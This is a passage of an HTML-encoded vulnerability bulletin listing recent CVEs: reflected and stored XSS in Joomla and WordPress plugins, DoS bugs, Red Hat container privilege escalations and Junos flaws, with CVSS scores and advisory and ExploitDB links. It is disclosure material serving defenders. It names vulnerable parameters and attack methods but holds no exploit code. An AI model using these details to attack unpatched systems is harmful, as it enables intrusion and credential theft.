<a href=3D"https://patchstack.com/database/wordpress/plugin/under-construct= ion-maintenance-mode/vulnerability/wordpress-under-construction-coming-soon= -maintenance-mode-plugin-2-1-1-cross-site-request-forgery-csrf-vulnerabilit= y?_s_id=3Dcve" target=3D"_blank" rel=3D"noopener">https://patchstack.com/da= tabase/wordpress/plugin/under-construction-maintenance-mode/vulnerability/w= ordpress-under-construction-coming-soon-maintenance-mode-plugin-2-1-1-cross= -site-request-forgery-csrf-vulnerability?_s_id=3Dcve</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Analytify--Simple Social Media Share Buttons</=

<td>Cross-Site Request Forgery (CSRF) vulnerability in Analytify Simple Soc= ial Media Share Buttons allows Cross Site Request Forgery.This issue affect=
s Simple Social Media Share Buttons: from n/a through 6.2.0.</td> <td>2026-04-07</td>
<td>7.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34904" target=3D= "_blank" rel=3D"noopener">CVE-2026-34904</a></td>

<a href=3D"https://patchstack.com/database/wordpress/plugin/simple-social-b= uttons/vulnerability/wordpress-simple-social-media-share-buttons-plugin-6-2= -0-cross-site-request-forgery-csrf-vulnerability?_s_id=3Dcve" target=3D"_bl= ank" rel=3D"noopener">https://patchstack.com/database/wordpress/plugin/simp= le-social-buttons/vulnerability/wordpress-simple-social-media-share-buttons= -plugin-6-2-0-cross-site-request-forgery-csrf-vulnerability?_s_id=3Dcve</a>= <br>=C2=A0</td>
</tr>
</tbody>
</table>
<p><a href=3D"#top">Back to top</a></p>
</div>
<div id=3D"medium_v">
<h2 id=3D"medium_v_title">Medium Vulnerabilities</h2>
<table class=3D"table no-tablesaw" style=3D"table-layout: fixed; width: 100= %;" border=3D"1" summary=3D"Medium Vulnerabilities" align=3D"center">
<thead>

<th class=3D"vendor-product" style=3D"width: 24%;" scope=3D"col">
<span class=3D"primary-vendor">Primary</span><br><span class=3D"primary-ven= dor">Vendor</span> -- Product</th>
<th style=3D"width: 44%;" scope=3D"col">Description</th>
<th style=3D"width: 10%;" scope=3D"col">Published</th>
<th style=3D"width: 8%;" scope=3D"col">CVSS Score</th>
<th style=3D"width: 7%;" scope=3D"col">Source Info</th>
<th style=3D"width: 7%;" scope=3D"col">Patch Info</th>
</tr>
</thead>
<tbody>

<td class=3D"vendor-product">Dynalon--MDwiki</td>
<td>MDwiki contains a cross-site scripting vulnerability that allows remote=
attackers to execute arbitrary JavaScript by injecting malicious code thro= ugh the location hash parameter. Attackers can craft URLs with JavaScript p= ayloads in the hash fragment that are parsed and rendered without sanitizat= ion, causing the injected scripts to execute in the victim's browser contex= t.</td>
<td>2026-04-12</td>
<td>6.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2017-20239" target=3D= "_blank" rel=3D"noopener">CVE-2017-20239</a></td>

<a href=3D"https://www.exploit-db.com/exploits/46097" target=3D"_blank" rel= =3D"noopener">ExploitDB-46097</a><br><a href=3D"https://www.vulncheck.com/a= dvisories/mdwiki-cross-site-scripting-via-location-hash-parameter" target= =3D"_blank" rel=3D"noopener">VulnCheck Advisory: MDwiki Cross-Site Scriptin=
g via Location Hash Parameter</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">NSauditor--SpotFTP Password Recover</td> <td>SpotFTP Password Recover 2.4.2 contains a denial of service vulnerabili=
ty that allows local attackers to crash the application by supplying an ove= rsized buffer in the Name field during registration. Attackers can generate=
a 256-byte payload, paste it into the Name input field, and trigger a cras=
h when submitting the registration code.</td>
<td>2026-04-12</td>
<td>6.2</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2019-25711" target=3D= "_blank" rel=3D"noopener">CVE-2019-25711</a></td>

<a href=3D"https://www.exploit-db.com/exploits/46088" target=3D"_blank" rel= =3D"noopener">ExploitDB-46088</a><br><a href=3D"https://www.vulncheck.com/a= dvisories/spotftp-password-recover-denial-of-service-via-name-field" target= =3D"_blank" rel=3D"noopener">VulnCheck Advisory: SpotFTP Password Recover 2= .4.2 Denial of Service via Name Field</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">NSauditor--BlueAuditor</td>
<td>BlueAuditor 1.7.2.0 contains a buffer overflow vulnerability in the reg= istration key field that allows local attackers to crash the application by=
submitting an oversized key value. Attackers can trigger a denial of servi=
ce by entering a 256-byte buffer of repeated characters in the Key registra= tion field, causing the application to crash during registration processing= .</td>
<td>2026-04-12</td>
<td>6.2</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2019-25712" target=3D= "_blank" rel=3D"noopener">CVE-2019-25712</a></td>

<a href=3D"https://www.exploit-db.com/exploits/46087" target=3D"_blank" rel= =3D"noopener">ExploitDB-46087</a><br><a href=3D"https://www.vulncheck.com/a= dvisories/blueauditor-buffer-overflow-denial-of-service-via-registration-ke=
y" target=3D"_blank" rel=3D"noopener">VulnCheck Advisory: BlueAuditor 1.7.2=
.0 Buffer Overflow Denial of Service via Registration Key</a><br>=C2=A0</td=

</tr>

<td class=3D"vendor-product">Synology--Synology SSL VPN Client</td>
<td>A files or directories accessible to external parties vulnerability in = Synology SSL VPN Client before 1.4.5-0684 allows remote attackers to access=
files within the installation directory via a local HTTP server bound to t=
he loopback interface. By leveraging user interaction with a crafted web pa= ge, attackers may retrieve sensitive files such as configuration files, cer= tificates, and logs, leading to information disclosure.</td> <td>2026-04-10</td>
<td>6.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2021-47960" target=3D= "_blank" rel=3D"noopener">CVE-2021-47960</a></td>

<a href=3D"https://www.synology.com/en-global/security/advisory/Synology_SA= _26_05" target=3D"_blank" rel=3D"noopener">Synology-SA-26:05 Synology SSL V=
PN Client</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Adivaha--WordPress adivaha Travel Plugin</td> <td>WordPress adivaha Travel Plugin 2.3 contains a reflected cross-site scr= ipting vulnerability that allows unauthenticated attackers to inject malici= ous scripts by manipulating the isMobile parameter. Attackers can craft mal= icious URLs containing JavaScript payloads in the isMobile GET parameter at=
the /mobile-app/v3/ endpoint to execute arbitrary code in victims' browser=
s and steal session tokens or credentials.</td>
<td>2026-04-09</td>
<td>6.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2023-54358" target=3D= "_blank" rel=3D"noopener">CVE-2023-54358</a></td>

<a href=3D"https://www.exploit-db.com/exploits/51663" target=3D"_blank" rel= =3D"noopener">ExploitDB-51663</a><br><a href=3D"https://www.adivaha.com/" t= arget=3D"_blank" rel=3D"noopener">Official Product Homepage</a><br><a href= =3D"https://wordpress.org/plugins/adiaha-hotel/" target=3D"_blank" rel=3D"n= oopener">Product Reference</a><br><a href=3D"https://www.vulncheck.com/advi= sories/wordpress-adivaha-travel-plugin-reflected-xss-via-ismobile" target= =3D"_blank" rel=3D"noopener">VulnCheck Advisory: WordPress adivaha Travel P= lugin 2.3 Reflected XSS via isMobile</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Jlexart--Joomla JLex Review</td>
<td>Joomla JLex Review 6.0.1 contains a reflected cross-site scripting vuln= erability that allows attackers to inject malicious scripts by manipulating=
the review_id URL parameter. Attackers can craft malicious links containin=
g JavaScript payloads that execute in victims' browsers when clicked, enabl= ing session hijacking or credential theft.</td>
<td>2026-04-09</td>
<td>6.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2023-54360" target=3D= "_blank" rel=3D"noopener">CVE-2023-54360</a></td>

<a href=3D"https://www.exploit-db.com/exploits/51645" target=3D"_blank" rel= =3D"noopener">ExploitDB-51645</a><br><a href=3D"https://jlexart.com/" targe= t=3D"_blank" rel=3D"noopener">Official Product Homepage</a><br><a href=3D"h= ttps://extensions.joomla.org/extension/jlex-review/" target=3D"_blank" rel= =3D"noopener">Product Reference</a><br><a href=3D"https://www.vulncheck.com= /advisories/joomla-jlex-review-reflected-xss-via-review-id-parameter" targe= t=3D"_blank" rel=3D"noopener">VulnCheck Advisory: Joomla JLex Review 6.0.1 = Reflected XSS via review_id Parameter</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Thethinkery--Joomla iProperty Real Estate</td> <td>Joomla iProperty Real Estate 4.1.1 contains a reflected cross-site scri= pting vulnerability that allows attackers to inject malicious scripts by ma= nipulating the filter_keyword parameter. Attackers can craft URLs containin=
g JavaScript payloads in the filter_keyword GET parameter of the all-proper= ties-with-map endpoint to execute arbitrary code in victim browsers and ste=
al session tokens or credentials.</td>
<td>2026-04-09</td>
<td>6.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2023-54361" target=3D= "_blank" rel=3D"noopener">CVE-2023-54361</a></td>

<a href=3D"https://www.exploit-db.com/exploits/51640" target=3D"_blank" rel= =3D"noopener">ExploitDB-51640</a><br><a href=3D"http://thethinkery.net" tar= get=3D"_blank" rel=3D"noopener">Official Product Homepage</a><br><a href=3D= "https://extensions.joomla.org/extension/vertical-markets/real-estate/iprop= erty/" target=3D"_blank" rel=3D"noopener">Product Reference</a><br><a href= =3D"https://www.vulncheck.com/advisories/joomla-iproperty-real-estate-refle= cted-xss-via-filter-keyword" target=3D"_blank" rel=3D"noopener">VulnCheck A= dvisory: Joomla iProperty Real Estate 4.1.1 Reflected XSS via filter_keywor= d</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Virtuemart--Cart</td>
<td>Joomla VirtueMart Shopping-Cart 4.0.12 contains a reflected cross-site = scripting vulnerability that allows attackers to inject malicious scripts b=
y manipulating the keyword parameter. Attackers can craft malicious URLs co= ntaining script payloads in the keyword parameter of the product-variants e= ndpoint to execute arbitrary JavaScript in victim browsers and steal sessio=
n tokens or credentials.</td>
<td>2026-04-09</td>
<td>6.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2023-54362" target=3D= "_blank" rel=3D"noopener">CVE-2023-54362</a></td>

<a href=3D"https://www.exploit-db.com/exploits/51631" target=3D"_blank" rel= =3D"noopener">ExploitDB-51631</a><br><a href=3D"https://www.virtuemart.net/=
" target=3D"_blank" rel=3D"noopener">Official Product Homepage</a><br><a hr= ef=3D"https://demo.virtuemart.net/" target=3D"_blank" rel=3D"noopener">Prod= uct Reference</a><br><a href=3D"https://www.vulncheck.com/advisories/joomla= -virtuemart-shopping-cart-reflected-xss-via-keyword" target=3D"_blank" rel= =3D"noopener">VulnCheck Advisory: Joomla VirtueMart Shopping-Cart 4.0.12 Re= flected XSS via keyword</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Solidres--Joomla Solidres</td>
<td>Joomla Solidres 2.13.3 contains a reflected cross-site scripting vulner= ability that allows unauthenticated attackers to inject malicious scripts b=
y manipulating multiple GET parameters including show, reviews, type_id, di= stance, facilities, categories, prices, location, and Itemid. Attackers can=
craft malicious URLs containing JavaScript payloads in these parameters to=
steal session tokens, login credentials, or manipulate site content when v= ictims visit the crafted links.</td>
<td>2026-04-09</td>
<td>6.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2023-54363" target=3D= "_blank" rel=3D"noopener">CVE-2023-54363</a></td>

<a href=3D"https://www.exploit-db.com/exploits/51638" target=3D"_blank" rel= =3D"noopener">ExploitDB-51638</a><br><a href=3D"http://solidres.com/" targe= t=3D"_blank" rel=3D"noopener">Official Product Homepage</a><br><a href=3D"h= ttps://extensions.joomla.org/extension/vertical-markets/booking-a-reservati= ons/solidres/" target=3D"_blank" rel=3D"noopener">Product Reference</a><br>=
<a href=3D"https://www.vulncheck.com/advisories/joomla-solidres-reflected-x= ss-via-multiple-parameters" target=3D"_blank" rel=3D"noopener">VulnCheck Ad= visory: Joomla Solidres 2.13.3 Reflected XSS via Multiple Parameters</a><br= >=C2=A0</td>
</tr>

<td class=3D"vendor-product">Hikashop--Joomla HikaShop</td>
<td>Joomla HikaShop 4.7.4 contains a reflected cross-site scripting vulnera= bility that allows unauthenticated attackers to inject malicious scripts by=
manipulating GET parameters in the product filter endpoint. Attackers can = craft malicious URLs containing XSS payloads in the from_option, from_ctrl,=
from_task, or from_itemid parameters to steal session tokens or login cred= entials when victims visit the link.</td>
<td>2026-04-09</td>
<td>6.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2023-54364" target=3D= "_blank" rel=3D"noopener">CVE-2023-54364</a></td>

<a href=3D"https://www.exploit-db.com/exploits/51629" target=3D"_blank" rel= =3D"noopener">ExploitDB-51629</a><br><a href=3D"https://www.hikashop.com/" = target=3D"_blank" rel=3D"noopener">Official Product Homepage</a><br><a href= =3D"https://demo.hikashop.com/index.php/en/" target=3D"_blank" rel=3D"noope= ner">Product Reference</a><br><a href=3D"https://www.vulncheck.com/advisori= es/joomla-hikashop-reflected-xss-via-product-filter" target=3D"_blank" rel= =3D"noopener">VulnCheck Advisory: Joomla HikaShop 4.7.4 Reflected XSS via P= roduct Filter</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">IBM--Concert</td>
<td>IBM Concert 1.0.0 through 2.2.0 creates temporary files with predictabl=
e names, which allows local users to overwrite arbitrary files via a symlin=
k attack.</td>
<td>2026-04-07</td>
<td>6.2</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-13044" target=3D= "_blank" rel=3D"noopener">CVE-2025-13044</a></td>

<a href=3D"https://www.ibm.com/support/pages/node/7268620" target=3D"_blank=
" rel=3D"noopener">https://www.ibm.com/support/pages/node/7268620</a><br>= =C2=A0</td>
</tr>

<td class=3D"vendor-product">elemntor--Elementor Website Builder more than = just a page builder</td>
<td>The Elementor Website Builder - More Than Just a Page Builder plugin fo=
r WordPress is vulnerable to Stored Cross-Site Scripting via several widget=
parameters in all versions up to, and including, 3.35.5 due to insufficien=
t input sanitization and output escaping. This makes it possible for authen= ticated attackers, with Contributor-level access and above, to inject arbit= rary web scripts in pages that will execute whenever a user accesses an inj= ected page.</td>
<td>2026-04-08</td>
<td>6.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-14732" target=3D= "_blank" rel=3D"noopener">CVE-2025-14732</a></td>

<a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/20232d= 70-72b2-47b7-ac7e-ad07892864ef?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/20232d70-72b= 2-47b7-ac7e-ad07892864ef?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/elementor/trunk/modules/wp-rest/classes/elementor-p= ost-meta.php#L67" target=3D"_blank" rel=3D"noopener">https://plugins.trac.w= ordpress.org/browser/elementor/trunk/modules/wp-rest/classes/elementor-post= -meta.php#L67</a><br><a href=3D"https://plugins.trac.wordpress.org/changese= t?old_path=3D/elementor/tags/3.35.5&new_path=3D/elementor/tags/3.35.6" targ= et=3D"_blank" rel=3D"noopener">https://plugins.trac.wordpress.org/changeset= ?old_path=3D/elementor/tags/3.35.5&new_path=3D/elementor/tags/3.35.6</a><br= >=C2=A0</td>
</tr>

<td class=3D"vendor-product">Juniper Networks--Junos OS</td>
<td>A=C2=A0Missing Authentication for Critical Function vulnerability in co= mmand processing of Juniper Networks Junos OS allows a privileged local att= acker to gain access to line cards running Junos OS Evolved as root. This i= ssue affects systems running Junos OS using Linux-based line cards. Affecte=
d line cards include: * MPC7, MPC8, MPC9, MPC10, MPC11 * LC2101, LC2103 * L= C480, LC4800, LC9600 * MX304 (built-in FPC) * MX-SPC3 * SRX5K-SPC3 * EX9200= -40XS * FPC3-PTX-U2, FPC3-PTX-U3 * FPC3-SFF-PTX * LC1101, LC1102, LC1104, L= C1105 This issue affects=C2=A0Junos OS:=C2=A0 * all versions before 22.4R3-= S8,=C2=A0 * from 23.2 before 23.2R2-S6,=C2=A0 * from 23.4 before 23.4R2-S6,= =C2=A0 * from 24.2 before 24.2R2-S3,=C2=A0 * from 24.4 before 24.4R2, * fro=
m 25.2 before 25.2R2.</td>
<td>2026-04-08</td>
<td>6.7</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-30650" target=3D= "_blank" rel=3D"noopener">CVE-2025-30650</a></td>

<a href=3D"https://github.com/orangecertcc/security-research/security/advis= ories/GHSA-fwhc-gh5m-v8fq" target=3D"_blank" rel=3D"noopener">https://githu= b.com/orangecertcc/security-research/security/advisories/GHSA-fwhc-gh5m-v8f= q</a><br><a href=3D"https://kb.juniper.net/JSA107863" target=3D"_blank" rel= =3D"noopener">https://kb.juniper.net/JSA107863</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Qualcomm, Inc.--Snapdragon</td>
<td>Memory Corruption when accessing freed memory due to concurrent fence d= eregistration and signal handling.</td>
<td>2026-04-06</td>
<td>6.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-47374" target=3D= "_blank" rel=3D"noopener">CVE-2025-47374</a></td>

<a href=3D"https://docs.qualcomm.com/product/publicresources/securitybullet= in/april-2026-bulletin.html" target=3D"_blank" rel=3D"noopener">https://doc= s.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin= .html</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Siklu--EtherHaul 8010</td>
<td>Siklu EtherHaul 8010 siklu-uimage-nxp-enc-10_6_2-18707-ea552dc00b devic=
es have a static root password.</td>
<td>2026-04-08</td>
<td>6.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-57175" target=3D= "_blank" rel=3D"noopener">CVE-2025-57175</a></td>

<a href=3D"https://semaja2.net/2025/04/30/siklu-eh-firmware-decryption/" ta= rget=3D"_blank" rel=3D"noopener">https://semaja2.net/2025/04/30/siklu-eh-fi= rmware-decryption/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Red Hat--Red Hat Ansible Automation Platform 2= </td>
<td>A container privilege escalation flaw was found in certain Ansible Auto= mation Platform images. This issue arises from the /etc/passwd file being c= reated with group-writable permissions during the build process. In certain=
conditions, an attacker who can execute commands within an affected contai= ner, even as a non-root user, can leverage their membership in the root gro=
up to modify the /etc/passwd file. This vulnerability allows an attacker to=
add a new user with any arbitrary UID, including UID 0, gaining full root = privileges within the container.</td>
<td>2026-04-08</td>
<td>6.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-57847" target=3D= "_blank" rel=3D"noopener">CVE-2025-57847</a></td>

<a href=3D"https://access.redhat.com/security/cve/CVE-2025-57847" target=3D= "_blank" rel=3D"noopener">https://access.redhat.com/security/cve/CVE-2025-5= 7847</a><br><a href=3D"https://bugzilla.redhat.com/show_bug.cgi?id=3D239109=
2" target=3D"_blank" rel=3D"noopener">RHBZ#2391092</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Red Hat--Multicluster Engine for Kubernetes</t=

<td>A container privilege escalation flaw was found in certain Multicluster=
Engine for Kubernetes images. This issue stems from the /etc/passwd file b= eing created with group-writable permissions during build time. In certain = conditions, an attacker who can execute commands within an affected contain= er, even as a non-root user, can leverage their membership in the root grou=
p to modify the /etc/passwd file. This could allow the attacker to add a ne=
w user with any arbitrary UID, including UID 0, leading to full root privil= eges within the container.</td>
<td>2026-04-08</td>
<td>6.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-57851" target=3D= "_blank" rel=3D"noopener">CVE-2025-57851</a></td>

<a href=3D"https://access.redhat.com/security/cve/CVE-2025-57851" target=3D= "_blank" rel=3D"noopener">https://access.redhat.com/security/cve/CVE-2025-5= 7851</a><br><a href=3D"https://bugzilla.redhat.com/show_bug.cgi?id=3D239110=
4" target=3D"_blank" rel=3D"noopener">RHBZ#2391104</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Red Hat--Red Hat Web Terminal</td>
<td>A container privilege escalation flaw was found in certain Web Terminal=
images. This issue stems from the /etc/passwd file being created with grou= p-writable permissions during build time. In certain conditions, an attacke=
r who can execute commands within an affected container, even as a non-root=
user, can leverage their membership in the root group to modify the /etc/p= asswd file. This could allow the attacker to add a new user with any arbitr= ary UID, including UID 0, leading to full root privileges within the contai= ner.</td>
<td>2026-04-08</td>
<td>6.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-57853" target=3D= "_blank" rel=3D"noopener">CVE-2025-57853</a></td>

<a href=3D"https://access.redhat.com/security/cve/CVE-2025-57853" target=3D= "_blank" rel=3D"noopener">https://access.redhat.com/security/cve/CVE-2025-5= 7853</a><br><a href=3D"https://bugzilla.redhat.com/show_bug.cgi?id=3D239110=
6" target=3D"_blank" rel=3D"noopener">RHBZ#2391106</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Red Hat--Red Hat OpenShift Update Service</td> <td>A container privilege escalation flaw was found in certain OpenShift Up= date Service (OSUS) images. This issue stems from the /etc/passwd file bein=
g created with group-writable permissions during build time. In certain con= ditions, an attacker who can execute commands within an affected container,=
even as a non-root user, may be able to leverage their membership in the r= oot group to modify the /etc/passwd file. This could allow the attacker to = add a new user with any arbitrary UID, including UID 0, leading to full roo=
t privileges within the container.</td>
<td>2026-04-08</td>
<td>6.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-57854" target=3D= "_blank" rel=3D"noopener">CVE-2025-57854</a></td>

<a href=3D"https://access.redhat.com/security/cve/CVE-2025-57854" target=3D= "_blank" rel=3D"noopener">https://access.redhat.com/security/cve/CVE-2025-5= 7854</a><br><a href=3D"https://bugzilla.redhat.com/show_bug.cgi?id=3D239110=
7" target=3D"_blank" rel=3D"noopener">RHBZ#2391107</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Red Hat--Red Hat Process Automation 7</td>
<td>A container privilege escalation flaw was found in certain Red Hat Proc= ess Automation Manager images. This issue stems from the /etc/passwd file b= eing created with group-writable permissions during build time. In certain = conditions, an attacker who can execute commands within an affected contain= er, even as a non-root user, can leverage their membership in the root grou=
p to modify the /etc/passwd file. This could allow the attacker to add a ne=
w user with any arbitrary UID, including UID 0, leading to full root privil= eges within the container.</td>
<td>2026-04-08</td>
<td>6.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-58713" target=3D= "_blank" rel=3D"noopener">CVE-2025-58713</a></td>

<a href=3D"https://access.redhat.com/security/cve/CVE-2025-58713" target=3D= "_blank" rel=3D"noopener">https://access.redhat.com/security/cve/CVE-2025-5= 8713</a><br><a href=3D"https://bugzilla.redhat.com/show_bug.cgi?id=3D239441=
9" target=3D"_blank" rel=3D"noopener">RHBZ#2394419</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Juniper Networks--Junos OS Evolved</td>
<td>A Buffer Copy without Checking Size of Input ('Classic Buffer Overflow'=
) vulnerability in the advanced forwarding toolkit (evo-aftmand/evo-pfemand=
) of Juniper Networks Junos OS Evolved on PTX Series or QFX5000 Series allo=
ws an unauthenticated, adjacent attacker to cause a Denial of Service (DoS)= .An attacker sending crafted multicast packets will cause line cards runnin=
g evo-aftmand/evo-pfemand to crash and restart or non-line card devices to = crash and restart.=C2=A0Continued receipt and processing of these packets w= ill sustain the Denial of Service (DoS) condition. This issue affects Junos=
OS Evolved PTX Series: * All versions before 22.4R3-S8-EVO, * from 23.2 be= fore 23.2R2-S5-EVO, * from 23.4 before 23.4R2-EVO, * from 24.2 before 24.2R= 2-EVO, * from 24.4 before=C2=A024.4R2-EVO. This issue affects Junos OS Evol= ved on QFX5000 Series: * 22.2-EVO version before 22.2R3-S7-EVO, * 22.4-EVO = version before 22.4R3-S7-EVO, * 23.2-EVO versions before 23.2R2-S4-EVO, * 2= 3.4-EVO versions before 23.4R2-S5-EVO, * 24.2-EVO versions before 24.2R2-S1= -EVO, * 24.4-EVO versions before 24.4R1-S3-EVO, 24.4R2-EVO. This issue does=
not affect Junos OS Evolved on QFX5000 Series versions before: 21.2R2-S1-E= VO, 21.2R3-EVO, 21.3R2-EVO, 21.4R1-EVO, and 22.1R1-EVO.</td> <td>2026-04-09</td>
<td>6.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-59969" target=3D= "_blank" rel=3D"noopener">CVE-2025-59969</a></td>

<a href=3D"https://kb.juniper.net/JSA103159" target=3D"_blank" rel=3D"noope= ner">https://kb.juniper.net/JSA103159</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">GitLab--GitLab</td>
<td>GitLab has remediated an issue in GitLab EE affecting all versions from=
18.2 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that coul=
d have allowed an authenticated user to cause denial of service to the GitL=
ab instance due to improper input validation in GraphQL queries.</td> <td>2026-04-08</td>
<td>6.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-1101" target=3D"= _blank" rel=3D"noopener">CVE-2026-1101</a></td>

<a href=3D"https://hackerone.com/reports/3460228" target=3D"_blank" rel=3D"= noopener">HackerOne Bug Bounty Report #3460228</a><br><a href=3D"https://gi= tlab.com/gitlab-org/gitlab/-/work_items/586488" target=3D"_blank" rel=3D"no= opener">https://gitlab.com/gitlab-org/gitlab/-/work_items/586488</a><br><a = href=3D"https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-1= 8-10-3-released/" target=3D"_blank" rel=3D"noopener">https://about.gitlab.c= om/releases/2026/04/08/patch-release-gitlab-18-10-3-released/</a><br>=C2=A0= </td>
</tr>

<td class=3D"vendor-product">usystemsgmbh--Webling</td>
<td>The Webling plugin for WordPress is vulnerable to Stored Cross-Site Scr= ipting in all versions up to, and including, 3.9.0 due to insufficient inpu=
t sanitization, insufficient output escaping, and missing capabilities chec=
ks in the 'webling_admin_save_form' and 'webling_admin_save_memberlist' fun= ctions. This makes it possible for authenticated attackers, with Subscriber= -level access and above, to inject Webling forms and memberlists with arbit= rary web scripts that will execute whenever an administrator views the rela= ted form or memberlist area of the WordPress admin.</td>
<td>2026-04-10</td>
<td>6.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-1263" target=3D"= _blank" rel=3D"noopener">CVE-2026-1263</a></td>

<a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/bd8fbe= 0d-0709-4fa2-9294-393ddcd05b22?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/bd8fbe0d-070= 9-4fa2-9294-393ddcd05b22?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/webling/tags/3.9.0/src/admin/lists/Form_List.php#L1= 22" target=3D"_blank" rel=3D"noopener">https://plugins.trac.wordpress.org/b= rowser/webling/tags/3.9.0/src/admin/lists/Form_List.php#L122</a><br><a href= =3D"https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin= /lists/Memberlist_List.php#L115" target=3D"_blank" rel=3D"noopener">https:/= /plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/lists/Memb= erlist_List.php#L115</a><br><a href=3D"https://plugins.trac.wordpress.org/b= rowser/webling/tags/3.9.0/src/admin/actions/save_form.php#L2" target=3D"_bl= ank" rel=3D"noopener">https://plugins.trac.wordpress.org/browser/webling/ta= gs/3.9.0/src/admin/actions/save_form.php#L2</a><br><a href=3D"https://plugi= ns.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/actions/save_mem= berlist.php#L2" target=3D"_blank" rel=3D"noopener">https://plugins.trac.wor= dpress.org/browser/webling/tags/3.9.0/src/admin/actions/save_memberlist.php= #L2</a><br><a href=3D"https://plugins.trac.wordpress.org/changeset?old_path= =3D%2Fwebling/tags/3.9.0&new_path=3D%2Fwebling/tags/3.9.1" target=3D"_blank=
" rel=3D"noopener">https://plugins.trac.wordpress.org/changeset?old_path=3D= %2Fwebling/tags/3.9.0&new_path=3D%2Fwebling/tags/3.9.1</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">magicplugins--Magic Conversation For Gravity F= orms</td>
<td>The Magic Conversation For Gravity Forms plugin for WordPress is vulner= able to Stored Cross-Site Scripting via the 'magic-conversation' shortcode =
in all versions up to, and including, 3.0.97 due to insufficient input sani= tization and output escaping on user supplied attributes. This makes it pos= sible for authenticated attackers, with contributor-level access and above,=
to inject arbitrary web scripts in pages that will execute whenever a user=
accesses an injected page.</td>
<td>2026-04-08</td>
<td>6.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-1396" target=3D"= _blank" rel=3D"noopener">CVE-2026-1396</a></td>

<a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/bc425c= 4a-cb4e-4f50-b85b-8c4c7778c073?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/bc425c4a-cb4= e-4f50-b85b-8c4c7778c073?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/magic-conversation-for-gravity-forms/trunk/main.php= #L1627" target=3D"_blank" rel=3D"noopener">https://plugins.trac.wordpress.o= rg/browser/magic-conversation-for-gravity-forms/trunk/main.php#L1627</a><br= ><a href=3D"https://plugins.trac.wordpress.org/browser/magic-conversation-f= or-gravity-forms/tags/3.0.96/main.php#L1627" target=3D"_blank" rel=3D"noope= ner">https://plugins.trac.wordpress.org/browser/magic-conversation-for-grav= ity-forms/tags/3.0.96/main.php#L1627</a><br><a href=3D"https://plugins.trac= .wordpress.org/changeset/3482359/magic-conversation-for-gravity-forms/trunk= /main.php" target=3D"_blank" rel=3D"noopener">https://plugins.trac.wordpres= s.org/changeset/3482359/magic-conversation-for-gravity-forms/trunk/main.php= </a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">realmag777--BEAR Bulk Editor and Products Mana= ger Professional for WooCommerce by Pluginus.Net</td>
<td>The BEAR - Bulk Editor and Products Manager Professional for WooCommerc=
